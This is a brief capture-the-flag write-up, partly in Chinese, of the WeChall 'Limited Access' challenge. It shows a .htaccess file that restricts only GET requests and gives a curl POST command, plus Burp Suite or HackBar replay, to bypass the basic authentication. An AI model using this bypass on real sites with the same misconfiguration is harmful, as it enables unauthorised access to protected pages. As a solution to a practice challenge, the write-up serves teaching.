WeChall - Limited Access

Challenge

I try to secure my pages with .htaccess. Am I doing it right?

To prove me wrong, please access protected/protected.php.

挑战页包含两个链接："my pages"（页面列表）和 ".htaccess"（源码）。

Solution

源码中的 .htaccess：

AuthUserFile .htpasswd
AuthGroupFile /dev/null
AuthName "Authorization Required for the Limited Access Challenge"
AuthType Basic

<Limit GET>
require valid-user
</Limit>

关键漏洞：<Limit GET> 只限制 GET 方法。其他 HTTP method（POST、PUT、PATCH 等）不受限制。

直接用 POST 请求即可绕过：

curl -X POST https://www.wechall.net/challenge/wannabe7331/limited_access/protected/protected.php

如果用浏览器，也可以直接写一个 <form method="POST"> 提交到目标 URL，或者用 Burp Suite / HackBar 把 GET 改成 POST 重放。